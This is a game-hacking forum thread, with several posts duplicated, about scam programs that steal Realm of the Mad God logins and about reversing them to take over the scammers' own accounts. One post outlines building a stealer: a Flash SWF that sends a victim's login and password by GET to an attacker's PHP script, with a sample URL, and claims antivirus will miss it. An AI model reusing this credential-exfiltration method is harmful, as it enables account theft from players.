Lol jNoob. Nice work. I'm curious, is it typical for a scammer program to contain such information that can be used against the scammer?
Kiddies keylogging ROTMG users
Exactly. Most of the time its readable (like here). Some times its Xored, or 3DES'ed, but it doesnt matter since the credentials must be send decyphered to the server (FTP or SMTP) (who said wireshark?). Or you can reverse the encryption by coding 
Still, there are dotnet crypters, but using some tools you can remove them.
RunPE, anti VM and anti XXX, all is 100% shit.
If the tools doesnt works, there is always Ollydbg, lordpe, your brain.
3 breakpoint and its always over.
Sometimes, when you can get the creds clearly, and they use SSL ( stopping wireshark) credentials can still be recovered using.... magic
Fun thing is when script kiddies own other kiddies who own other kiddies, etc...
Imagine how i laugh

Still, there are dotnet crypters, but using some tools you can remove them.
RunPE, anti VM and anti XXX, all is 100% shit.
If the tools doesnt works, there is always Ollydbg, lordpe, your brain.
3 breakpoint and its always over.
Sometimes, when you can get the creds clearly, and they use SSL ( stopping wireshark) credentials can still be recovered using.... magic

Fun thing is when script kiddies own other kiddies who own other kiddies, etc...
Imagine how i laugh

I always scan my clients for this shit.
gj jnoob lol i used to do shit like this on the derpweb to paedos lol just to fuck with them 

@JustAnoobROTMG : what was on those accounts you got hold of?
Couple of tops. Also mainly UT.
---------- Post added at 07:50 AM ---------- Previous post was at 07:44 AM ----------
Exactly. You need to use the same the method than most stealers nowadays : make the SWF call a distant PHP script you setup, using "GET"
like GET http:/booya.com/myrotmgtrap.php?login=nilly@mpgh&password=iroxatro tmghacking
.
* Easy as hell
* Most AV wont detect it (they may detect bad SWF but a bad SWF is one who use a vulnerability of the Flasj player.. We are not using a vuln at all)
---------- Post added at 07:50 AM ---------- Previous post was at 07:44 AM ----------
Exactly. You need to use the same the method than most stealers nowadays : make the SWF call a distant PHP script you setup, using "GET"
like GET http:/booya.com/myrotmgtrap.php?login=nilly@mpgh&password=iroxatro tmghacking
.* Easy as hell
* Most AV wont detect it (they may detect bad SWF but a bad SWF is one who use a vulnerability of the Flasj player.. We are not using a vuln at all)
I Think you can also edit the action script or somethin.
Good for you.
Well this guy just tried to scam me. Was offering free gold.
Skype denchikcae
From Russia
Sent me a link that came back clean via Kaspersky. Downloading the program that also came back clean. Realized that it was simply something you "log in" with your realm info and hit get gold. So phisher, but a very obvious one. Sad i remember when phishers were embedded very good into things. Not all in your face obvious. I have the link also, not sure i should post it since its a scam.
Skype denchikcae
From Russia
Sent me a link that came back clean via Kaspersky. Downloading the program that also came back clean. Realized that it was simply something you "log in" with your realm info and hit get gold. So phisher, but a very obvious one. Sad i remember when phishers were embedded very good into things. Not all in your face obvious. I have the link also, not sure i should post it since its a scam.
@Turbofox, no don't post the link.
Also to anyone who doesn't know any better. Virus scans help but they won't catch everything. They can't tell if a program is supposed to function in a certain way or not and thus people can easily make something malicious that will not be detected by anti viruses.
Also to anyone who doesn't know any better. Virus scans help but they won't catch everything. They can't tell if a program is supposed to function in a certain way or not and thus people can easily make something malicious that will not be detected by anti viruses.
JustAnoobROTMG post us a muledump screeny to share some roflcopter time 

This is funny because i found a "Special Client.exe" which was intended to be a 15.0 hacked client.
NECROBUMP MOTHAFUCKA !!

* If you click on cancel, it initiate an emergency computer shutdown
* Login+password sent are ciphered, you need to copypaste some code of the stealer into a c# project and voila
I found this very funny. If anyone want the sample file, i can give a link by PM

* If you click on cancel, it initiate an emergency computer shutdown

* Login+password sent are ciphered, you need to copypaste some code of the stealer into a c# project and voila
I found this very funny. If anyone want the sample file, i can give a link by PM
Dat 5 month bump...
